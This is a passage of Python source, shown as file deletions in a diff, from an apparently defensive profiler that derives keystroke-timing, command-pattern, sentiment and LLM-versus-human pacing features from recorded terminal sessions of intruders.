# layout fingerprinting (PII boundary lifted by ANTI for Phase F).
typed_unigram_counts: Mapping[str, int] = field(default_factory=dict)
typed_bigram_counts: Mapping[str, int] = field(default_factory=dict)
typed_letter_count: int = 0
# Step G.0 derivations — lexical counters from the same single-pass
# typed-text walk. No raw text retained; only fixed-vocabulary
# membership counts and run-lengths. Drives valence (G.5), arousal
# (G.6), and frustration_venting (G.8).
obscenity_hits: int = 0
positive_lex_hits: int = 0
negative_lex_hits: int = 0
caps_run_max: int = 0
bang_run_max: int = 0
def _detect_paste_bursts(
inputs: list[AsciinemaEvent],
) -> tuple[tuple[PasteBurst, ...], int]:
"""Group consecutive paste-class input events into PasteBursts.
A paste-class event is one with ``len(data) >= PASTE_MIN_CHARS_PER_EVENT``.
Two adjacent paste-class events collapse into the same burst when
their IAT is within ``PASTE_BURST_MAX_IAT_S``; otherwise a new
burst opens. Returns the bursts and the total count of paste-class
events (the same number ``BEHAVE`` prototype calls ``paste_events``).
"""
bursts: list[PasteBurst] = []
paste_count = 0
cur_start: float | None = None
cur_end: float = 0.0
cur_chars: int = 0
cur_events: int = 0
last_t: float | None = None
def _close() -> None:
nonlocal cur_start, cur_end, cur_chars, cur_events
if cur_start is not None and cur_events > 0:
bursts.append(PasteBurst(
start_ts=cur_start,
end_ts=cur_end,
char_count=cur_chars,
event_count=cur_events,
))
cur_start = None
cur_end = 0.0
cur_chars = 0
cur_events = 0
for t, _kind, data in inputs:
is_paste = len(data) >= PASTE_MIN_CHARS_PER_EVENT
if is_paste:
paste_count += 1
if cur_start is None or (
last_t is not None and (t - last_t) > PASTE_BURST_MAX_IAT_S
):
_close()
cur_start = t
cur_end = t
cur_chars += len(data)
cur_events += 1
else:
_close()
last_t = t
_close()
return tuple(bursts), paste_count
_BACKSPACE_CHARS = ("\x7f", "\x08")
_KILL_LINE_CHARS = ("\x15", "\x17")
def _scan_correction_signals(
inputs: list[AsciinemaEvent],
) -> tuple[int, tuple[float, ...], int]:
"""Walk input events char-by-char, count backspaces / kill-lines /
timing IATs.
PII discipline: only counts and IATs leave this function — no
character data is retained or returned.
"""
backspace_count = 0
kill_line_count = 0
iats: list[float] = []
last_non_bs_t: float | None = None
for t, _kind, data in inputs:
for c in data:
if c in _BACKSPACE_CHARS:
backspace_count += 1
if last_non_bs_t is not None:
iats.append(max(0.0, t - last_non_bs_t))
elif c in _KILL_LINE_CHARS:
kill_line_count += 1
last_non_bs_t = t
else:
last_non_bs_t = t
return backspace_count, tuple(iats), kill_line_count
def _split_typing_bursts(iats: tuple[float, ...]) -> tuple[tuple[float, ...], ...]:
"""Split a flat IAT sequence at gaps > IKI_THINK_MAX_S.
Drops bursts of fewer than 3 IATs — too short to compute a stable
CV. Mirrors BEHAVE prototype's ``_split_into_bursts``.
"""
bursts: list[list[float]] = [[]]
for x in iats:
if x > IKI_THINK_MAX_S:
if bursts[-1]:
bursts.append([])
else:
bursts[-1].append(x)
return tuple(tuple(b) for b in bursts if len(b) >= 3)
def _segment_commands(inputs: list[AsciinemaEvent]) -> tuple[Command, ...]:
"""Walk input events, splitting on ``\\r`` / ``\\n`` into commands.
Retains only the first whitespace-delimited token as a sha256 hash
plus three integer counters needed for the Phase C
``motor.shell_mastery.*`` primitives:
* ``tab_count`` — ``\\t`` (0x09) keystrokes in the command
* ``shortcut_count`` — readline control bytes from
:data:`SHORTCUT_CTRL_BYTES`
* ``pipe_count`` — ``|`` characters in the command (counted on
every byte; pasted pipelines still indicate pipeline fluency the
operator chose to execute)
Buffer contents are dropped on every command boundary; an
unterminated trailing buffer (no final newline) yields no command.
"""
cmds: list[Command] = []
buf_chars: list[str] = []
buf_start_ts: float | None = None
tab_count = 0
shortcut_count = 0
pipe_count = 0
for t, _kind, data in inputs:
for c in data:
if c in ("\r", "\n"):
if buf_chars:
text = "".join(buf_chars).strip()
first_token = text.split(maxsplit=1)[0] if text else ""
cmds.append(Command(
start_ts=buf_start_ts if buf_start_ts is not None else t,
end_ts=t,
first_token_hash=hash_token(first_token),
tab_count=tab_count,
shortcut_count=shortcut_count,
pipe_count=pipe_count,
))
buf_chars = []
buf_start_ts = None
tab_count = 0
shortcut_count = 0
pipe_count = 0
else:
if not buf_chars:
buf_start_ts = t
buf_chars.append(c)
if c == "\t":
tab_count += 1
elif c == "|":
pipe_count += 1
elif c in SHORTCUT_CTRL_BYTES:
shortcut_count += 1
return tuple(cmds)
def _annotate_commands_with_output(
commands: tuple[Command, ...],
outputs: list[AsciinemaEvent],
) -> tuple[tuple[Command, ...], tuple[PromptLine, ...]]:
"""Re-emit ``commands`` with output-derived fields filled.
Returns ``(commands, prompt_lines)``. Each ``Command`` gains
``errored``, ``output_bytes``, and ``followed_by_prompt`` (Step
F.0). The flattened tuple of all detected ``PromptLine`` instances
across every command's window is returned alongside for the caller
to install on ``SessionContext.prompt_lines``.
The output window for ``commands[i]`` spans from its ``end_ts``
(the ``\\r``/``\\n`` that ran it) to the ``start_ts`` of the next
command. The last command's window is open-ended (``math.inf``)
so output events arriving at or after ``t_end`` are still captured.
"""
if not commands:
return commands, ()
annotated: list[Command] = []
all_prompts: list[PromptLine] = []
for i, cmd in enumerate(commands):
win_end = commands[i + 1].start_ts if i + 1 < len(commands) else math.inf
byte_count, errored, prompts = _output_window(outputs, cmd.end_ts, win_end)
all_prompts.extend(prompts)
annotated.append(Command(
start_ts=cmd.start_ts,
end_ts=cmd.end_ts,
first_token_hash=cmd.first_token_hash,
tab_count=cmd.tab_count,
shortcut_count=cmd.shortcut_count,
pipe_count=cmd.pipe_count,
errored=errored,
output_bytes=byte_count,
followed_by_prompt=bool(prompts),
))
return tuple(annotated), tuple(all_prompts)
def _per_command_iats(
commands: tuple[Command, ...],
inputs: list[AsciinemaEvent],
) -> tuple[tuple[float, ...], ...]:
"""Per-command IATs between consecutive input events whose
timestamps fall in ``[cmd.start_ts, cmd.end_ts)``.
Excludes the terminator IAT (the last event at ``cmd.end_ts`` is
the ``\\r``/``\\n`` itself). Returns one tuple per command.
"""
out: list[tuple[float, ...]] = []
for cmd in commands:
prev_t: float | None = None
cmd_iats: list[float] = []
for t, _kind, _data in inputs:
if t < cmd.start_ts or t >= cmd.end_ts:
continue
if prev_t is not None:
cmd_iats.append(max(0.0, t - prev_t))
prev_t = t
out.append(tuple(cmd_iats))
return tuple(out)
def _output_bytes_between(
outputs: list[AsciinemaEvent],
start: float,
end: float,
) -> int:
"""Total ``len(d)`` of output events with ``start <= t < end``."""
return sum(len(d) for t, _k, d in outputs if start <= t < end)
def _typed_char_histograms(
inputs: list[AsciinemaEvent],
) -> tuple[Mapping[str, int], Mapping[str, int], int, _LexCounters]:
"""Walk input events, build typed-only unigram + bigram histograms
plus the Phase G lexical counters.
Skip paste-class events (``len(data) >= PASTE_MIN_CHARS_PER_EVENT``)
— pasted text reveals nothing about the operator's keyboard or
sentiment. Letter bigrams chain only across consecutive ASCII-letter
chars; a digit or punctuation character breaks the chain.
Lexical counters (G.0): a small word buffer (≤ ``LEXEME_MAX_LEN``)
accumulates ASCII-letter chars (case-folded). On any non-letter
boundary, every suffix of the buffer is checked against
``POSITIVE_LEXEMES`` / ``NEGATIVE_LEXEMES`` / ``OBSCENITY_LEXEMES``;
the longest match wins (so ``fucking`` counts as one obscenity hit,
not two — ``fuck`` + ``fucking``). Caps and bang runs are tracked
in the same walk.
Returns ``(unigrams, bigrams, total_letters, lex_counters)``.
"""
unigrams: dict[str, int] = {}
bigrams: dict[str, int] = {}
total_letters = 0
last_letter: str | None = None
word_buf: list[str] = []
obscenity_hits = 0
positive_lex_hits = 0
negative_lex_hits = 0
caps_run_cur = 0
caps_run_max = 0
bang_run_cur = 0
bang_run_max = 0
def _flush_word() -> tuple[int, int, int]:
"""Match longest lexeme suffix in ``word_buf``; return per-set deltas."""
if not word_buf:
return 0, 0, 0
s = "".join(word_buf)
# Longest-suffix scan against fixed lexicons.
for length in range(min(len(s), LEXEME_MAX_LEN), 0, -1):
suffix = s[-length:]
if suffix in OBSCENITY_LEXEMES:
return 1, 0, 0
if suffix in POSITIVE_LEXEMES:
return 0, 1, 0
if suffix in NEGATIVE_LEXEMES:
return 0, 0, 1
return 0, 0, 0
for _t, _kind, data in inputs:
if len(data) >= PASTE_MIN_CHARS_PER_EVENT:
# Paste boundary breaks every running counter.
last_letter = None
obs_d, pos_d, neg_d = _flush_word()
obscenity_hits += obs_d
positive_lex_hits += pos_d
negative_lex_hits += neg_d
word_buf.clear()
caps_run_cur = 0
bang_run_cur = 0
continue
for c in data:
# Caps-run tracking
if c.isascii() and c.isupper():
caps_run_cur += 1
if caps_run_cur > caps_run_max:
caps_run_max = caps_run_cur
else:
caps_run_cur = 0
# Bang-run tracking
if c == "!":
bang_run_cur += 1
if bang_run_cur > bang_run_max:
bang_run_max = bang_run_cur
else:
bang_run_cur = 0
# Histogram + lexeme buffering
if c.isascii() and c.isalpha():
lower = c.lower()
unigrams[lower] = unigrams.get(lower, 0) + 1
total_letters += 1
if last_letter is not None:
big = last_letter + lower
bigrams[big] = bigrams.get(big, 0) + 1
last_letter = lower
word_buf.append(lower)
if len(word_buf) > LEXEME_MAX_LEN:
# Slide window — only the tail can match a lexeme.
word_buf[:] = word_buf[-LEXEME_MAX_LEN:]
else:
last_letter = None
obs_d, pos_d, neg_d = _flush_word()
obscenity_hits += obs_d
positive_lex_hits += pos_d
negative_lex_hits += neg_d
word_buf.clear()
# Trailing word (no boundary at end of input).
obs_d, pos_d, neg_d = _flush_word()
obscenity_hits += obs_d
positive_lex_hits += pos_d
negative_lex_hits += neg_d
if len(bigrams) > LAYOUT_BIGRAM_TOP_N:
top = sorted(bigrams.items(), key=lambda kv: -kv[1])[:LAYOUT_BIGRAM_TOP_N]
bigrams = dict(top)
return unigrams, bigrams, total_letters, _LexCounters(
obscenity_hits=obscenity_hits,
positive_lex_hits=positive_lex_hits,
negative_lex_hits=negative_lex_hits,
caps_run_max=caps_run_max,
bang_run_max=bang_run_max,
)
def _output_window(
outputs: list[AsciinemaEvent],
start: float,
end: float,
) -> tuple[int, bool, tuple[PromptLine, ...]]:
"""Walk output events in ``[start, end)`` once.
Returns ``(byte_count, errored, prompt_lines)``. ``byte_count`` is
the raw byte count (pre-strip); ``errored`` is the canonical-error
-pattern match over the ANSI-stripped concatenation;
``prompt_lines`` is the tuple of PS1 lines detected in the same
stripped text (Step F.0).
PII trade-off (Phase F): the stripped text itself is dropped on
return, but ``prompt_lines`` retains PS1 strings (capped at
``PROMPT_LINE_MAX_CHARS``). Only derived values leave the engine
via observations; the prompt strings live on ``SessionContext``
so F.1 / F.3 / E.4 can read them.
"""
chunks: list[str] = []
last_ts = start
byte_count = 0
for t, _k, d in outputs:
if start <= t < end:
byte_count += len(d)
chunks.append(d)
last_ts = t
if not chunks:
return 0, False, ()
stripped = strip_ansi("".join(chunks))
errored = detect_error_in_output(stripped)
prompts = tuple(extract_prompt_lines(
stripped, base_ts=last_ts, max_chars=PROMPT_LINE_MAX_CHARS,
))
return byte_count, errored, prompts
def build_session_context(
events: Iterable[AsciinemaEvent],
*,
sid: str,
source: str,
evidence_ref: str | None = None,
) -> SessionContext:
"""Single-pass build of the SessionContext for ``events``."""
inputs: list[AsciinemaEvent] = []
outputs: list[AsciinemaEvent] = []
t_first: float | None = None
t_last: float = 0.0
for ev in events:
t, kind, _ = ev
if t_first is None:
t_first = t
if t > t_last:
t_last = t
if kind == "i":
inputs.append(ev)
elif kind == "o":
outputs.append(ev)
if t_first is None:
t_start = 0.0
t_end = 0.0
else:
t_start = t_first
t_end = t_last
iats: tuple[float, ...] = tuple(
max(0.0, inputs[i][0] - inputs[i - 1][0]) for i in range(1, len(inputs))
)
paste_bursts, paste_count = _detect_paste_bursts(inputs)
typing_bursts = _split_typing_bursts(iats)
backspace_count, backspace_iats, kill_line_count = _scan_correction_signals(inputs)
commands = _segment_commands(inputs)
commands, prompt_lines = _annotate_commands_with_output(commands, outputs)
inter_cmd_iats = tuple(
max(0.0, commands[i + 1].start_ts - commands[i].end_ts)
for i in range(len(commands) - 1)
)
output_per_cmd = tuple(
_output_bytes_between(outputs, commands[i].end_ts, commands[i + 1].start_ts)
for i in range(len(commands) - 1)
)
intra_command_iats = _per_command_iats(commands, inputs)
typed_uni, typed_bi, typed_letters, lex = _typed_char_histograms(inputs)
return SessionContext(
sid=sid,
source=source,
evidence_ref=evidence_ref or f"session:{sid}",
t_start=t_start,
t_end=t_end,
duration_s=max(0.0, t_end - t_start),
input_events=tuple(inputs),
output_events=tuple(outputs),
iats=iats,
paste_bursts=paste_bursts,
paste_event_count=paste_count,
commands=commands,
inter_cmd_iats=inter_cmd_iats,
output_per_cmd=output_per_cmd,
typing_bursts=typing_bursts,
backspace_count=backspace_count,
backspace_iats=backspace_iats,
kill_line_count=kill_line_count,
intra_command_iats=intra_command_iats,
prompt_lines=prompt_lines,
typed_unigram_counts=typed_uni,
typed_bigram_counts=typed_bi,
typed_letter_count=typed_letters,
obscenity_hits=lex.obscenity_hits,
positive_lex_hits=lex.positive_lex_hits,
negative_lex_hits=lex.negative_lex_hits,
caps_run_max=lex.caps_run_max,
bang_run_max=lex.bang_run_max,
)

View File

@@ -1,104 +0,0 @@
"""Registered feature functions.
Each entry takes a ``SessionContext`` and yields zero or more
``Observation`` instances. Adding a primitive = adding a function in a
sibling module and appending it to ``FEATURES``.
"""
from __future__ import annotations
from typing import Callable, Iterable
from behave_core.spec.envelope import Observation
from decnet.profiler.behave_shell._ctx import SessionContext
from decnet.profiler.behave_shell._features.cognitive import (
cognitive_load,
command_branch_diversity,
error_resilience_fallback_to_man,
error_resilience_frustration_typing,
error_resilience_retry_tactic,
exploration_style,
feedback_loop_engagement,
planning_depth,
tool_vocabulary,
inter_command_consistency,
inter_command_latency_class,
)
from decnet.profiler.behave_shell._features.emotional_valence import (
arousal,
frustration_venting,
stress_response,
valence,
)
from decnet.profiler.behave_shell._features.environmental import (
keyboard_layout,
locale,
numpad_usage,
shell_type,
terminal_multiplexer,
)
from decnet.profiler.behave_shell._features.operational import (
cleanup_behavior,
multi_actor_indicators,
objective,
opsec_discipline,
)
from decnet.profiler.behave_shell._features.temporal import (
escalation_pattern,
exit_behavior,
landing_ritual,
session_duration,
)
from decnet.profiler.behave_shell._features.motor import (
command_chunking,
error_correction,
input_modality,
keystroke_cadence,
motor_stability,
paste_burst_rate,
pipe_chaining_depth,
shortcut_usage,
tab_completion,
)
FeatureFn = Callable[[SessionContext], Iterable[Observation]]
FEATURES: tuple[FeatureFn, ...] = (
input_modality,
paste_burst_rate,
keystroke_cadence,
motor_stability,
error_correction,
command_chunking,
tab_completion,
shortcut_usage,
pipe_chaining_depth,
inter_command_latency_class,
command_branch_diversity,
feedback_loop_engagement,
inter_command_consistency,
cognitive_load,
exploration_style,
planning_depth,
tool_vocabulary,
error_resilience_retry_tactic,
error_resilience_frustration_typing,
error_resilience_fallback_to_man,
session_duration,
escalation_pattern,
landing_ritual,
exit_behavior,
shell_type,
terminal_multiplexer,
locale,
keyboard_layout,
numpad_usage,
objective,
opsec_discipline,
cleanup_behavior,
multi_actor_indicators,
valence,
arousal,
stress_response,
frustration_venting,
)

View File

@@ -1,32 +0,0 @@
"""Helper for building registry-valid :class:`Observation` records.
Every feature module would otherwise repeat the same Window /
source / evidence_ref boilerplate. This helper centralises it and is
the one place to reach when emission semantics change (e.g. when we
start parametrising windows on a per-primitive basis).
"""
from __future__ import annotations
from typing import Any
from behave_core.spec.envelope import Observation, Window
from decnet.profiler.behave_shell._ctx import SessionContext
def make_observation(
ctx: SessionContext,
*,
primitive: str,
value: Any,
confidence: float,
) -> Observation:
"""Build one :class:`Observation` for the whole-session window."""
return Observation(
primitive=primitive,
value=value,
confidence=confidence,
window=Window(start_ts=ctx.t_start, end_ts=ctx.t_end),
source=ctx.source,
evidence_ref=ctx.evidence_ref,
)

View File

@@ -1,593 +0,0 @@
"""``cognitive.*`` feature functions.
Step 5: ``cognitive.inter_command_latency_class``.
Step 6: ``cognitive.command_branch_diversity``.
Step 7: ``cognitive.feedback_loop_engagement``.
Step 8: ``cognitive.inter_command_consistency``.
Step D.1: ``cognitive.cognitive_load``.
"""
from __future__ import annotations
import statistics
from typing import Iterator
from behave_core.spec.envelope import Observation
from decnet.profiler.behave_shell._ctx import SessionContext
from decnet.profiler.behave_shell._features._emit import make_observation
from decnet.profiler.behave_shell._parse import hash_token
from decnet.profiler.behave_shell._thresholds import (
BRANCH_DIVERSITY_LINEAR_MIN,
COGNITIVE_LOAD_CHUNKING_REF_CV,
COGNITIVE_LOAD_LOW_MAX,
COGNITIVE_LOAD_MEDIUM_MAX,
COGNITIVE_LOAD_PACE_REF_CV,
EXPLORATION_CHAOTIC_BACKTRACK_MIN,
EXPLORATION_TARGETED_REP_MIN,
FEEDBACK_CORRELATION_MIN,
FEEDBACK_MIN_PAIRS,
FRUSTRATION_LOW_MAX,
FRUSTRATION_MODERATE_MAX,
IKI_THINK_MAX_S,
INTER_CMD_DELIBERATE_MAX,
INTER_CMD_INSTANT_MAX,
INTER_CMD_LLM_HEAVYWEIGHT_MAX,
INTER_CMD_LLM_LIGHTWEIGHT_MAX,
INTER_CMD_TYPING_MAX,
MIN_COMMANDS_FOR_FULL_CONFIDENCE,
PAUSE_CV_BIMODAL_MIN,
PAUSE_CV_METRONOMIC_MAX,
PLANNING_DEEP_MIN,
PLANNING_REACTIVE_MIN,
TOOL_VOCAB_BROAD_MIN,
TOOL_VOCAB_NARROW_MAX,
)
# Precomputed at import time so the per-session hot loop is a set
# membership check, not 3 sha256 ops per command. The ``--help`` /
# ``-h`` flag forms can't be detected here — they're not first tokens
# (PII discipline keeps only the *first* token's hash). v0.2 will
# reconsider once corpus calibration justifies storing arg-token
# hashes too.
_HELP_FAMILY_HASHES: frozenset[str] = frozenset({
hash_token("man"),
hash_token("help"),
hash_token("info"),
})
def _clip01(x: float) -> float:
if x < 0.0:
return 0.0
if x > 1.0:
return 1.0
return x
def _cv(xs: tuple[float, ...] | list[float]) -> float | None:
"""Coefficient of variation; ``None`` if undefined (n<2 or mean==0)."""
if len(xs) < 2:
return None
mean = statistics.fmean(xs)
if mean <= 0.0:
return None
return statistics.stdev(xs) / mean
def _bucket_inter_cmd_latency(median_iat: float) -> str:
if median_iat <= INTER_CMD_INSTANT_MAX:
return "instant"
if median_iat <= INTER_CMD_TYPING_MAX:
return "typing_speed"
if median_iat <= INTER_CMD_DELIBERATE_MAX:
return "deliberate"
if median_iat <= INTER_CMD_LLM_LIGHTWEIGHT_MAX:
return "llm_lightweight"
if median_iat <= INTER_CMD_LLM_HEAVYWEIGHT_MAX:
return "llm_heavyweight"
return "long"
def inter_command_latency_class(ctx: SessionContext) -> Iterator[Observation]:
"""Emit ``cognitive.inter_command_latency_class``.
Operator's *thinking pace* between commands, bucketed against
calibrated thresholds. Splits LW-sim / CLAUDE-FF / CLAUDE-CL.
"""
if not ctx.inter_cmd_iats:
return
median_iat = statistics.median(ctx.inter_cmd_iats)
bucket = _bucket_inter_cmd_latency(median_iat)
# Sample-size honesty: < 5 commands → halve confidence
if len(ctx.commands) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
confidence = 0.40
else:
confidence = 0.80
yield make_observation(
ctx,
primitive="cognitive.inter_command_latency_class",
value=bucket,
confidence=confidence,
)
def command_branch_diversity(ctx: SessionContext) -> Iterator[Observation]:
"""Emit ``cognitive.command_branch_diversity``.
Content-based discriminator (no timing): unique first-token ratio
over total commands. Splits CLAUDE-FF (linear_playbook) from
CLAUDE-CL (adaptive_branching). The empirical anchor on
2026-05-02: fire-and-forget runs ~10 distinct tools; closed-loop
runs 5-6 with ``curl`` re-invoked as the operator chases threads.
"""
n = len(ctx.commands)
if n == 0:
# No commands at all → nothing honest to say. Skip emission.
return
if n < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
# Registry admits "unknown"; absence of *enough* data is itself
# a high-confidence answer.
yield make_observation(
ctx,
primitive="cognitive.command_branch_diversity",
value="unknown",
confidence=1.0,
)
return
unique = len({c.first_token_hash for c in ctx.commands})
ratio = unique / n
if ratio >= BRANCH_DIVERSITY_LINEAR_MIN:
value = "linear_playbook"
else:
# Anything below the linear floor is treated as adaptive — the
# operator is reusing tools, the discriminative signal we
# actually want.
value = "adaptive_branching"
yield make_observation(
ctx,
primitive="cognitive.command_branch_diversity",
value=value,
confidence=0.80,
)
def feedback_loop_engagement(ctx: SessionContext) -> Iterator[Observation]:
"""Emit ``cognitive.feedback_loop_engagement``.
Pearson correlation between ``output_per_cmd[i]`` (bytes the
operator saw before the next command) and
``inter_cmd_iats[i]`` (the pause that followed). closed_loop
operators read more before pausing more; fire_and_forget operators
pace independently of output. CUTS ACROSS the LLM/human axis —
closed-loop LLMs and reading humans both score closed_loop.
First primitive that depends on output events: zero output events
in the shard → emit ``unknown`` at confidence 1.0 (no honest
correlation possible) and exit.
"""
pairs = list(zip(ctx.output_per_cmd, ctx.inter_cmd_iats))
if not ctx.output_events or len(pairs) < FEEDBACK_MIN_PAIRS:
if not ctx.commands:
return
yield make_observation(
ctx,
primitive="cognitive.feedback_loop_engagement",
value="unknown",
confidence=1.0,
)
return
xs = [float(p[0]) for p in pairs]
ys = [float(p[1]) for p in pairs]
try:
r = statistics.correlation(xs, ys)
except statistics.StatisticsError:
# Constant series on either axis — correlation undefined.
yield make_observation(
ctx,
primitive="cognitive.feedback_loop_engagement",
value="unknown",
confidence=1.0,
)
return
if r > FEEDBACK_CORRELATION_MIN:
value = "closed_loop"
else:
value = "fire_and_forget"
yield make_observation(
ctx,
primitive="cognitive.feedback_loop_engagement",
value=value,
confidence=0.75,
)
def error_resilience_fallback_to_man(ctx: SessionContext) -> Iterator[Observation]:
"""Emit ``cognitive.error_resilience.fallback_to_man``.
For each errored command, check whether the operator's next
command is ``man`` / ``help`` / ``info`` — i.e. they reached for
the manual rather than re-trying or pivoting. If at least one
errored command triggered this fallback → ``present``; otherwise
``absent``.
Skip emission when no commands errored — the registry's binary
has no ``unknown``, and emitting ``absent`` from no observation
at all would be dishonest.
The ``--help`` / ``-h`` flag forms can't fire this primitive in
v0.1: they aren't first tokens, and the engine only retains
``first_token_hash`` per command (PII discipline). Filed for v0.2.
"""
errored_indices = [i for i, c in enumerate(ctx.commands) if c.errored]
if not errored_indices:
return
fallback_count = 0
for i in errored_indices:
if i + 1 >= len(ctx.commands):
continue
if ctx.commands[i + 1].first_token_hash in _HELP_FAMILY_HASHES:
fallback_count += 1
value = "present" if fallback_count > 0 else "absent"
if len(errored_indices) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
confidence = 0.40
else:
confidence = 0.65
yield make_observation(
ctx,
primitive="cognitive.error_resilience.fallback_to_man",
value=value,
confidence=confidence,
)
def error_resilience_frustration_typing(ctx: SessionContext) -> Iterator[Observation]:
"""Emit ``cognitive.error_resilience.frustration_typing``.
Compares median within-command IAT for commands *following* an
errored command against the same statistic for commands following
a successful command. A large relative delta indicates the operator
typed differently after a failure — speed-up (rage / fluency) or
slowdown (caution); both are signs of arousal.
Skip emission when either group is empty (no errors, or every
command errored — no clean baseline). Sample-size honesty drops
confidence below the floor.
"""
post_err: list[float] = []
post_ok: list[float] = []
cmds = ctx.commands
intra = ctx.intra_command_iats
if len(cmds) < 2 or len(intra) != len(cmds):
return
for i in range(1, len(cmds)):
cmd_iats = intra[i]
if not cmd_iats:
continue
m = statistics.median(cmd_iats)
if cmds[i - 1].errored:
post_err.append(m)
else:
post_ok.append(m)
if not post_err or not post_ok:
return
median_err = statistics.median(post_err)
median_ok = statistics.median(post_ok)
if median_ok <= 0.0:
return
delta = abs(median_err - median_ok) / median_ok
if delta < FRUSTRATION_LOW_MAX:
value = "low"
elif delta < FRUSTRATION_MODERATE_MAX:
value = "moderate"
else:
value = "high"
if len(post_err) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
confidence = 0.40
else:
confidence = 0.60
yield make_observation(
ctx,
primitive="cognitive.error_resilience.frustration_typing",
value=value,
confidence=confidence,
)
def error_resilience_retry_tactic(ctx: SessionContext) -> Iterator[Observation]:
"""Emit ``cognitive.error_resilience.retry_tactic``.
For each command with ``Command.errored=True``, classify the
operator's response by the *next* command:
* **rerun** — same first_token_hash as the errored command. The
operator re-invoked the same tool (often after fixing args
mid-edit, but we can't see args).
* **switch** — different first_token_hash. Pivoted to a different
tool.
* **abort** — no next command. Session ended after the error.
The session's reported tactic is the **modal** response across all
errored commands (with ties broken in registry order: rerun >
modify > switch > abort). Skip emission entirely when no commands
errored — the registry has no ``unknown`` here, and silence is the
most honest answer.
The ``modify`` value (edit-and-retry) requires within-command
diffing of arg tokens, which crosses the PII boundary the engine
holds (only ``first_token_hash`` is retained per command). v0.1
therefore never emits ``modify``; v0.2 will once the PII trade-off
is revisited against a real attacker corpus.
"""
errored = [(i, c) for i, c in enumerate(ctx.commands) if c.errored]
if not errored:
return
counts = {"rerun": 0, "switch": 0, "abort": 0}
for i, cmd in errored:
if i + 1 >= len(ctx.commands):
counts["abort"] += 1
elif ctx.commands[i + 1].first_token_hash == cmd.first_token_hash:
counts["rerun"] += 1
else:
counts["switch"] += 1
# Registry-order tiebreak (rerun > modify > switch > abort).
# `modify` deferred — never increments here.
order = ("rerun", "switch", "abort")
value = max(order, key=lambda k: counts[k])
if len(errored) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
confidence = 0.40
else:
confidence = 0.65
yield make_observation(
ctx,
primitive="cognitive.error_resilience.retry_tactic",
value=value,
confidence=confidence,
)
def tool_vocabulary(ctx: SessionContext) -> Iterator[Observation]:
"""Emit ``cognitive.tool_vocabulary`` ∈ {narrow, moderate, broad}.
Absolute count of distinct first_token_hashes. Skip emission when
no commands exist; below the sample-size floor we still emit, but
at confidence 0.40 — a session with few commands but five distinct
tools is genuinely a moderate-vocabulary signal.
"""
if not ctx.commands:
return
distinct = len({c.first_token_hash for c in ctx.commands})
if distinct <= TOOL_VOCAB_NARROW_MAX:
value = "narrow"
elif distinct >= TOOL_VOCAB_BROAD_MIN:
value = "broad"
else:
value = "moderate"
if len(ctx.commands) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
confidence = 0.40
else:
confidence = 0.70
yield make_observation(
ctx,
primitive="cognitive.tool_vocabulary",
value=value,
confidence=confidence,
)
def planning_depth(ctx: SessionContext) -> Iterator[Observation]:
"""Emit ``cognitive.planning_depth`` ∈ {deep, shallow, reactive}.
Read off the distribution of inter-command IATs:
* **deep** — many think-pauses (> ``IKI_THINK_MAX_S``). The
operator stops to think between commands.
* **reactive** — most pauses are sub-instant
(≤ ``INTER_CMD_INSTANT_MAX``). Knee-jerk pacing — automated
runner, prepared playbook, or an LLM with no internal latency.
* **shallow** — neither: mostly typing-speed pauses, no extended
contemplation.
Skip emission when no inter-command IATs exist (one or zero
commands); the registry has no ``unknown`` for this primitive.
"""
iats = ctx.inter_cmd_iats
if not iats:
return
n = len(iats)
deep_count = sum(1 for x in iats if x > IKI_THINK_MAX_S)
reactive_count = sum(1 for x in iats if x <= INTER_CMD_INSTANT_MAX)
deep_frac = deep_count / n
reactive_frac = reactive_count / n
if deep_frac >= PLANNING_DEEP_MIN:
value = "deep"
elif reactive_frac >= PLANNING_REACTIVE_MIN:
value = "reactive"
else:
value = "shallow"
if len(ctx.commands) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
confidence = 0.40
else:
confidence = 0.65
yield make_observation(
ctx,
primitive="cognitive.planning_depth",
value=value,
confidence=confidence,
)
def exploration_style(ctx: SessionContext) -> Iterator[Observation]:
"""Emit ``cognitive.exploration_style`` ∈ {methodical, chaotic, targeted}.
Two-axis classification over the first_token_hash sequence:
* **methodical** — low repetition, low backtracks. Operator marches
forward through new tools.
* **targeted** — high repetition (R ≥ EXPLORATION_TARGETED_REP_MIN).
Same tool re-invoked repeatedly; the operator is drilling.
* **chaotic** — high backtrack rate (J ≥ EXPLORATION_CHAOTIC_BACKTRACK_MIN).
Jumps among previously-used tools without a clear thread.
The registry doesn't permit ``unknown``; below the
MIN_COMMANDS_FOR_FULL_CONFIDENCE floor we emit at confidence 0.40
rather than skip — the engine has *some* signal, just less of it.
Skip emission only when there are no commands at all.
"""
n = len(ctx.commands)
if n == 0:
return
hashes = [c.first_token_hash for c in ctx.commands]
unique = len(set(hashes))
repetition_rate = 0.0 if n == 0 else 1.0 - (unique / n)
# Backtrack: at position i, hashes[i] previously seen at index < i-1
# and not equal to hashes[i-1]. (Repeating the immediate predecessor
# is "drilling", picked up by repetition_rate; backtrack is the
# non-local jump signal.)
seen_before: set[str] = set()
backtracks = 0
transitions = 0
if hashes:
seen_before.add(hashes[0])
for i in range(1, n):
transitions += 1
if hashes[i] != hashes[i - 1] and hashes[i] in seen_before:
backtracks += 1
seen_before.add(hashes[i])
backtrack_rate = (backtracks / transitions) if transitions else 0.0
if backtrack_rate >= EXPLORATION_CHAOTIC_BACKTRACK_MIN:
value = "chaotic"
elif repetition_rate >= EXPLORATION_TARGETED_REP_MIN:
value = "targeted"
else:
value = "methodical"
if n < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
confidence = 0.40
else:
confidence = 0.60
yield make_observation(
ctx,
primitive="cognitive.exploration_style",
value=value,
confidence=confidence,
)
def cognitive_load(ctx: SessionContext) -> Iterator[Observation]:
"""Emit ``cognitive.cognitive_load`` ∈ {low, medium, high}.
Composite of three [0, 1]-clipped sub-signals, mean-aggregated:
* **chunking** — median CV of intra-command IATs / reference CV.
Fragmented mid-command typing → high contribution.
* **errors** — fraction of commands whose post-execution output
matched a canonical error fingerprint (``Command.errored`` from
Step D.0). Failures pile load.
* **pace variability** — CV of inter-command IATs / reference CV.
A spread of think-pause durations → unsettled cadence → load.
